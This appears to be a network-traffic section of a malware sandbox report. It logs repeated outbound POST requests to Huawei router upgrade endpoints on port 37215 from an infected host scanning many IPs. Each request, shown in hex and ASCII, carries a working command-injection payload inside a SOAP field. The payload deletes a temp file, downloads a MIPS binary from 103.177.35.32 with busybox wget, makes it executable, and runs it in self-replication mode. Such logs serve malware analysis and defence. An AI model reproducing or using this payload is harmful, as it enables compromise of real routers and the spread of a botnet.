                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        616192.168.2.2354118122.24.225.23637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492367983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        617192.168.2.234512841.152.79.2437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492402077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        618192.168.2.235081476.1.108.24237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492405891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        619192.168.2.2355368197.18.203.7937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492444038 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        620192.168.2.234545293.62.178.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492454052 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        621192.168.2.2341456133.9.114.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492458105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        622192.168.2.233718641.2.29.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492480040 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        623192.168.2.2357346197.156.21.13537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492480040 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        624192.168.2.2338032197.188.195.11537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493050098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        625192.168.2.234267062.166.239.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493056059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
